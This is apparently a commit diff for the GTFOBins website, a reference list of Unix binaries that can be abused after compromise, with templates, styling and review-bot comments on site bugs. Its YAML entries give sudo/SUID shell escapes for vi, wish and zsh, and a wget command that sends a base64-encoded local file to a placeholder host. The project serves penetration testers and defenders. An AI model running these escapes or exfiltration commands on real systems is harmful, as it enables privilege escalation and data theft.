||||
:set shell=/bin/sh
|
||||
:shell
|
||||
sudo-enabled:
|
||||
- code: sudo vi -c ':!/bin/sh'
|
||||
suid-enabled:
|
||||
- code: ./vi -c ':!/bin/sh -p'
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
wget $URL -O $LFILE
|
||||
---
|
|
@ -0,0 +1,11 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: zsh
|
||||
sudo-enabled:
|
||||
- code: sudo zsh
|
||||
suid-enabled:
|
||||
- code: ./zsh
|
||||
---
|
|
@ -0,0 +1,57 @@
|
|||
<input id="bin-search" type="text" placeholder="Filter by name, just start typing..."/>
|
||||
|
||||
<div id="bin-table-wrapper">
|
||||
<table id="bin-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Binary</th>
|
||||
<th>Functions</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
{% for file in site.gtfobins %}
|
||||
<tr>
|
||||
<td><a href="{{ file.url }}" class="bin-name">{% include get_bin_name path=file.path %}</a></td>
|
||||
<td>{% include function_list.html bin=file %}</td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</tbody>
|
||||
<tfoot>
|
||||
<tr><td id="search-message" colspan="2">No binary matches...</td></tr>
|
||||
</tfoot>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
var searchBox = document.querySelector('#bin-search');
|
||||
var searchMessage = document.querySelector('#search-message');
|
||||
searchMessage.style.display = 'none';
|
||||
|
||||
// ensure height during filtering
|
||||
var binTableWrapper = document.querySelector('#bin-table-wrapper');
|
||||
binTableWrapper.style.height = binTableWrapper.clientHeight + 'px';
|
||||
|
||||
searchBox.addEventListener('input', function () {
|
||||
var query = searchBox.value.toLowerCase().trim();
|
||||
var noResults = true;
|
||||
|
||||
document.querySelectorAll('#bin-table tbody tr').forEach(function (row) {
|
||||
var binName = row.firstElementChild.firstElementChild.innerText;
|
||||
if (binName.indexOf(query) !== -1) {
|
||||
row.style.display = '';
|
||||
noResults = false;
|
||||
} else {
|
||||
row.style.display = 'none';
|
||||
}
|
||||
});
|
||||
|
||||
searchMessage.style.display = noResults ? '' : 'none';
|
||||
});
|
||||
|
||||
addEventListener('keydown', function (event) {
|
||||
if (event.key.toLowerCase().match(/^[a-z]$/)) {
|
||||
searchBox.focus();
|
||||
}
|
||||
});
|
||||
|
||||
</script>
|
|
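Review bot: The filter compares `binName.indexOf(query)` where `query` is lower-cased but `binName` (the anchor's `innerText`) is not, so a binary whose name contains an upper-case character can never match; `var binName = row.firstElementChild.firstElementChild.innerText.toLowerCase();` fixes it. The global `keydown` handler also focuses the search box on every bare letter regardless of modifiers, so shortcuts such as Ctrl+F or Cmd+L move focus into the input; a guard `if (event.ctrlKey || event.metaKey || event.altKey) return;` before the regex test avoids that.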
@ -0,0 +1,6 @@
|
|||
<ul class="function-list">
|
||||
{% for function in include.bin.functions %}
|
||||
{% assign type = function[0] %}
|
||||
<li><a href="{{ include.bin.url }}#{{ type }}">{{ site.data.functions[type].label }}</a></li>
|
||||
{% endfor %}
|
||||
</ul>
|
|
@ -0,0 +1,7 @@
|
|||
<dl>
|
||||
{% for function_pair in site.data.functions %}
|
||||
{% assign function = function_pair[1] %}
|
||||
<dt class="function-name">{{ function.label }}</dt>
|
||||
<dd>{{ function.description | markdownify }}</dd>
|
||||
{% endfor %}
|
||||
</dl>
|
|
@ -0,0 +1 @@
|
|||
{% assign fn_parts = include.path | split: '/' | last | split: '.' %}{% assign fn_parts_size = fn_parts | size %}{% if fn_parts_size < 3 %}{{- fn_parts[0] -}}{% else %}{{- fn_parts[0] -}}.{{- fn_parts[1] -}}{% endif %}
|
|
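Review bot: The include assumes a file name has at most three dot-separated parts: `ld.so.md` yields `ld.so`, but a name with four parts (say `a.b.c.md`) would be cut to `a.b`, because only `fn_parts[0]` and `fn_parts[1]` are joined. Dropping just the extension, `{{ fn_parts | pop | join: '.' }}`, handles any number of dots; since `ld.so` is the only multi-dot case in this commit, a comment stating the assumption would also do.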
@ -0,0 +1,6 @@
|
|||
<h1>
|
||||
{% if page.url != '/' %}
|
||||
<a href="/">..</a> /
|
||||
{% endif %}
|
||||
{{ include.title }}
|
||||
</h1>
|
|
@ -0,0 +1,46 @@
|
|||
---
|
||||
layout: common
|
||||
---
|
||||
|
||||
{% capture bin_name %}{% include get_bin_name path=page.path %}{% endcapture %}
|
||||
|
||||
{% include page_title.html title=bin_name %}
|
||||
|
||||
{% include function_list.html bin=page %}
|
||||
|
||||
{{ page.description | markdownify }}
|
||||
|
||||
{% for function in page.functions %}
|
||||
|
||||
{% assign function_name = function[0] %}
|
||||
{% assign examples = function[1] %}
|
||||
|
||||
<h2 id="{{ function_name }}" class="function-name">
|
||||
{{- site.data.functions[function_name].label -}}
|
||||
</h2>
|
||||
|
||||
{{ site.data.functions[function_name].description | markdownify }}
|
||||
|
||||
{% for example in examples %}
|
||||
|
||||
<div class="example">
|
||||
{{ example.description | markdownify }}
|
||||
|
||||
{% capture code %}
|
||||
{%- if function_name == 'suid-enabled' or function_name == 'suid-limited' %}
|
||||
cp $(which {{ bin_name }}) .
|
||||
sudo chown 0 ./{{ bin_name }}
|
||||
sudo chmod +s ./{{ bin_name }}
|
||||
{% endif %}
|
||||
{{ example.code }}
|
||||
{% endcapture %}
|
||||
|
||||
<pre><code>
|
||||
{{- code | strip -}}
|
||||
</code></pre>
|
||||
|
||||
</div>
|
||||
|
||||
{% endfor %}
|
||||
|
||||
{% endfor %}
|
|
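Review bot: `{{- code | strip -}}` injects the example code into `<pre><code>` without HTML escaping, so any example containing `<` or `&` — the tclsh and wish examples use `<@stdin`, the bash download uses `0<&3` — is handed to the browser as markup rather than text, and a contributed example could inject arbitrary HTML into the page. `{{- code | strip | escape -}}` keeps the rendered text identical to the source. The same consideration applies to `example.description`, though `markdownify` is presumably intended to allow markup there.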
@ -0,0 +1,22 @@
|
|||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<title>
|
||||
{{ site.title }}
|
||||
{% if page.url != '/' %}
|
||||
|
|
||||
{% if page.layout == 'bin' %}
|
||||
{{ page.title | downcase }}
|
||||
{% else %}
|
||||
{{ page.title }}
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
</title>
|
||||
<link rel="stylesheet" href="/style.css" type="text/css"/>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=yes">
|
||||
</head>
|
||||
<body>
|
||||
{{ content }}
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
layout: common
|
||||
---
|
||||
|
||||
{% include page_title.html title=page.title %}
|
||||
|
||||
{{ content }}
|
|
@ -0,0 +1,45 @@
|
|||
---
|
||||
layout: page
|
||||
title: Contribute
|
||||
---
|
||||
|
||||
## Structure
|
||||
|
||||
Each GTFO binary is defined in a file in the `_gtfobins/` folder named as `<binary name>.md`, such file consists only of a [YAML] front matter which describes the binary and its functions.
|
||||
|
||||
[YAML]: http://yaml.org/
|
||||
|
||||
The full syntax is the following:
|
||||
|
||||
```
|
||||
description: Optional description of the binary
|
||||
functions:
|
||||
FUNCTION:
|
||||
- description: Optional description of the example
|
||||
code: Code of the example
|
||||
- ....
|
||||
FUNCTION:
|
||||
- description: Optional description of the example
|
||||
code: Code of the example
|
||||
- ...
|
||||
...
|
||||
```
|
||||
|
||||
Where `FUNCTION` is one of the values described in the `_data/functions.yml` file.
|
||||
|
||||
Feel free to use any file in the `_gtfobins/` folder as an example.
|
||||
|
||||
Pull request process
|
||||
--------------------
|
||||
|
||||
Vendor software is accepted as well as standard Unix binaries. Binaries and techniques that only works on certain operating systems and versions are accepted and such limitations shall be noted in the `description` field.
|
||||
|
||||
Before sending a pull request of a new binary or function, ensure the following:
|
||||
|
||||
1. Verify the function works on at least one type of modern Unix system.
|
||||
2. Classifying SUID-related functions may be tricky because they depend on how the default shell behaves on different systems (i.e. Ubuntu vs. Debian) and how the external command is called (i.e. `exec()` family vs. `system()`). Check how the binary behaves:
|
||||
- The function is considered `suid-enabled` if runs external commands with SUID privileges on Ubuntu Linux.
|
||||
- The function is considered `suid-limited` if runs external commands with SUID privileges on Debian but it drops the privileges on Ubuntu Linux.
|
||||
3. Verify `sudo-enabled` function runs external commands under the `sudo` privileged context.
|
||||
|
||||
Pull requests adding new functions in `_data/functions.yml` are allowed and subjected to project maintainers vetting.
|
|
@ -0,0 +1,8 @@
|
|||
---
|
||||
layout: page
|
||||
title: Functions
|
||||
---
|
||||
|
||||
A binary may support one or more of the following functions:
|
||||
|
||||
{% include functions_description.html %}
|
|
@ -0,0 +1,16 @@
|
|||
---
|
||||
layout: page
|
||||
title: GTFOBins
|
||||
---
|
||||
|
||||
GTFOBins is a curated list of Unix binaries that can be leveraged by an attacker to bypass system security restrictions.
|
||||
|
||||
This was inspired by the [LOLBins and LOLScripts](https://github.com/api0cradle/LOLBAS) project for Windows environment.
|
||||
|
||||
The project collects legitimate Unix binaries that can be abused to <strike>get the f**k</strike> break out restricted shells, escalate or maintain elevated privileges, download or exfiltrate files, and facilitate the other post-exploitation tasks outlined [here](/functions/).
|
||||
|
||||
GTFOBins aims to be a shared project where everyone can contribute with additional binaries and techniques. You can find detailed instructions [here](/contribute/).
|
||||
|
||||
## List of GTFOBins
|
||||
|
||||
{% include bin_table.html %}
|
|
@ -0,0 +1,117 @@
|
|||
---
|
||||
---
|
||||
|
||||
$accent: #bf0707;
|
||||
$lighter: #fff4f4;
|
||||
$hover: #ff0000;
|
||||
|
||||
// layout
|
||||
|
||||
@media (min-width: 1000px) {
|
||||
body {
|
||||
width: 800px;
|
||||
margin: 0 auto;
|
||||
}
|
||||
}
|
||||
|
||||
// common tags
|
||||
|
||||
body {
|
||||
font-family: sans, sans-serif;
|
||||
}
|
||||
|
||||
code {
|
||||
padding: 0.15em 0.25em;
|
||||
border-radius: 0.25em;
|
||||
color: $accent;
|
||||
background: $lighter;
|
||||
}
|
||||
|
||||
pre {
|
||||
background: $lighter;
|
||||
padding: 1em;
|
||||
overflow-x: auto;
|
||||
|
||||
code {
|
||||
padding: 0;
|
||||
border-radius: 0;
|
||||
}
|
||||
}
|
||||
|
||||
a:link, a:visited {
|
||||
color: $accent;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
color: $hover;
|
||||
}
|
||||
|
||||
// fragment targets
|
||||
|
||||
*:target {
|
||||
border-left: 5px solid $accent;
|
||||
padding-left: 5px;
|
||||
}
|
||||
|
||||
// binary list and search
|
||||
|
||||
#bin-search {
|
||||
padding: 0.5em;
|
||||
width: 100%;
|
||||
box-sizing: border-box;
|
||||
}
|
||||
|
||||
#bin-table {
|
||||
width: 100%;
|
||||
|
||||
th, td {
|
||||
padding: 0.2em 1em;
|
||||
}
|
||||
|
||||
th {
|
||||
text-align: left;
|
||||
}
|
||||
|
||||
#search-message {
|
||||
text-align: center;
|
||||
padding: 1em;
|
||||
}
|
||||
}
|
||||
|
||||
// function description
|
||||
|
||||
.function-list {
|
||||
font-size: 0.8rem;
|
||||
list-style: none;
|
||||
padding: 0;
|
||||
margin: 0;
|
||||
|
||||
li {
|
||||
display: inline-block;
|
||||
padding: 0.25em 0.5em;
|
||||
margin: 0.05em 0;
|
||||
border: 1px solid $accent;
|
||||
|
||||
a:link, a:visited {
|
||||
color: $accent;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
&:hover, a:hover {
|
||||
color: $hover;
|
||||
border-color: $hover;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// classes
|
||||
|
||||
.bin-name {
|
||||
font-family: monospace;
|
||||
font-size: 1.2rem;
|
||||
}
|
||||
|
||||
.function-name {
|
||||
font-size: 1.4rem;
|
||||
font-weight: bold;
|
||||
}
|
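Review bot: `font-family: sans, sans-serif;` names `sans`, which is not a CSS generic family; it resolves only where the platform font configuration aliases it (fontconfig on Linux) and is ignored elsewhere, so the rule effectively says `sans-serif`. `font-family: sans-serif;` states that directly. The `*:target` rule also styles the `<h2 id=...>` function headings when linked by fragment — presumably intended, but a comment above the rule saying so would save the next reader a check.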